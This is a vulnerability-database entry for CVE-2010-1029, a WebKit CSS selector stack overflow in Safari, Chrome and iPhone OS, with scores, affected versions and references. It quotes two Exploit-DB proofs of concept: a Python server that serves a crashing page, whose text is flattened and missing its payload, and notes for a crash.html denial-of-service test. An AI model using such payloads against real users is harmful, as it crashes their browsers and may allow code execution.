CVE-2010-1029 : Detail

CVE-2010-1029

89.86%V3
Network
2010-03-19 20:00 +00:00
2017-09-18 10:57 +00:00

Alert for a CVE

Stay informed of any changes for a specific CVE.
Alert management

Descriptions

Stack consumption vulnerability in the WebCore::CSSSelector function in WebKit, as used in Apple Safari 4.0.4, Apple Safari on iPhone OS and iPhone OS for iPod touch, and Google Chrome 4.0.249, allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a STYLE element composed of a large number of *> sequences.

Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Metrics

Metric Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 11574

Publication date : 2010-02-23 23:00 +00:00
Author : t12
EDB Verified : No

#!/usr/bin/python # , # dM # MMr # 4MMML . # MMMMM. xf # . "M6MMM .MM- # Mh.. +MM5MMM .MMMM # .MMM. .MMMMML. MMMMMh # )MMMh. MM5MMM MMMMMMM # 3MMMMx. 'MMM3MMf xnMMMMMM" # '*MMMMM MMMMMM. nMMMMMMP" # *MMMMMx "MMM5M\ .MMMMMMM= # *MMMMMh "MMMMM" JMMMMMMP # MMMMMM GMMMM. dMMMMMM . # MMMMMM "MMMM .MMMMM( .nnMP" # .. *MMMMx MMM" dMMMM" .nnMMMMM* # "MMn... 'MMMMr 'MM MMM" .nMMMMMMM*" # "4MMMMnn.. *MMM MM MMP" .dMMMMMMM"" # ^MMMMMMMMx. *ML "M .M* .MMMMMM**" # *PMMMMMMhn. *x > M .MMMM**"" # ""**MMMMhx/.h/ .=*" # .3P"%.... # [t12] nP" "*MMnx # SMOKE WEED #greetz to my blackhatz and baycatz #iPhone CSS::Selector crash #this Python script acts as a web server and sends a malformed long string to the CSS """; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.bind(('',2121)); s.listen(1); while True: channel, details = s.accept(); print channel.recv(1024); channel.send(html); channel.close(); main();
Exploit Database EDB-ID : 11567

Publication date : 2010-02-23 23:00 +00:00
Author : Rad L. Sneak
EDB Verified : Yes

Apple Safari 4.0.4 & Google Chrome 4.0.249 CSS style Stack Overflow DoS/PoC Thank you Rad L. Sneak

Apple Safari 4.0.4 & Google Chrome 4.0.249 CSS style Stack Overflow DoS/PoC Tested on WinXP SP3 and Windows 7 64bit Also works on Apple iPhone Safari Stack Overflow caused by long malformed string inside of Code will cause Apple Safari to crash throwing a stack overflow Chrome will through up the "Aw, Snap!" Found by Rad L. Sneak using BF3 admin@blue-dogz.com What's up Sliccc1....Where's my app cheers to mithcebones Save the code below into as crash.html and open in Safari 4.0.4 or later OR open with Google Chrome 4.0.249 or later _______________________________________________________________________________________________________

Products Mentioned

Configuraton 0

Apple>>Safari >> Version 4.0.4

Configuraton 0

Google>>Chrome >> Version 4.0.249.0

Configuraton 0

Apple>>Safari >> Version *

Apple>>Iphone_os >> Version *

Apple>>Iphone_os >> Version 1.0

    Apple>>Iphone_os >> Version 1.0.0

    Apple>>Iphone_os >> Version 1.0.1

    Apple>>Iphone_os >> Version 1.0.1

    Apple>>Iphone_os >> Version 1.0.2

    Apple>>Iphone_os >> Version 1.0.2

    Apple>>Iphone_os >> Version 1.1

      Apple>>Iphone_os >> Version 1.1.0

      Apple>>Iphone_os >> Version 1.1.0

      Apple>>Iphone_os >> Version 1.1.0

      Apple>>Iphone_os >> Version 1.1.1

      Apple>>Iphone_os >> Version 1.1.1

      Apple>>Iphone_os >> Version 1.1.2

      Apple>>Iphone_os >> Version 1.1.2

      Apple>>Iphone_os >> Version 1.1.2

      Apple>>Iphone_os >> Version 1.1.3

      Apple>>Iphone_os >> Version 1.1.3

      Apple>>Iphone_os >> Version 1.1.3

      Apple>>Iphone_os >> Version 1.1.4

      Apple>>Iphone_os >> Version 1.1.4

      Apple>>Iphone_os >> Version 1.1.4

      Apple>>Iphone_os >> Version 1.1.5

      Apple>>Iphone_os >> Version 1.1.5

      Apple>>Iphone_os >> Version 1.1.5

      Apple>>Iphone_os >> Version 2.0

      Apple>>Iphone_os >> Version 2.0.0

      Apple>>Iphone_os >> Version 2.0.0

      Apple>>Iphone_os >> Version 2.0.0

      Apple>>Iphone_os >> Version 2.0.1

      Apple>>Iphone_os >> Version 2.0.1

      Apple>>Iphone_os >> Version 2.0.1

      Apple>>Iphone_os >> Version 2.0.2

      Apple>>Iphone_os >> Version 2.0.2

      Apple>>Iphone_os >> Version 2.0.2

      Apple>>Iphone_os >> Version 2.1

      Apple>>Iphone_os >> Version 2.1

      Apple>>Iphone_os >> Version 2.1

      Apple>>Iphone_os >> Version 2.1.1

      Apple>>Iphone_os >> Version 2.2

      Apple>>Iphone_os >> Version 2.2

      Apple>>Iphone_os >> Version 2.2

      Apple>>Iphone_os >> Version 2.2.1

      Apple>>Iphone_os >> Version 2.2.1

      Apple>>Iphone_os >> Version 2.2.1

      Apple>>Iphone_os >> Version 3.0

      Apple>>Iphone_os >> Version 3.0

      Apple>>Iphone_os >> Version 3.0.1

      Apple>>Iphone_os >> Version 3.0.1

      Apple>>Iphone_os >> Version 3.1.2

      Apple>>Iphone_os >> Version 3.1.2

      References

      http://secunia.com/advisories/43068
      Tags : third-party-advisory, x_refsource_SECUNIA
      http://www.exploit-db.com/exploits/11574
      Tags : exploit, x_refsource_EXPLOIT-DB
      http://www.exploit-db.com/exploits/11567
      Tags : exploit, x_refsource_EXPLOIT-DB
      http://www.securityfocus.com/bid/38398
      Tags : vdb-entry, x_refsource_BID
      http://www.vupen.com/english/advisories/2011/0212
      Tags : vdb-entry, x_refsource_VUPEN
      Click on the button to the left (OFF), to authorize the inscription of cookie improving the functionalities of the site. Click on the button to the left (Accept all), to unauthorize the inscription of cookie improving the functionalities of the site.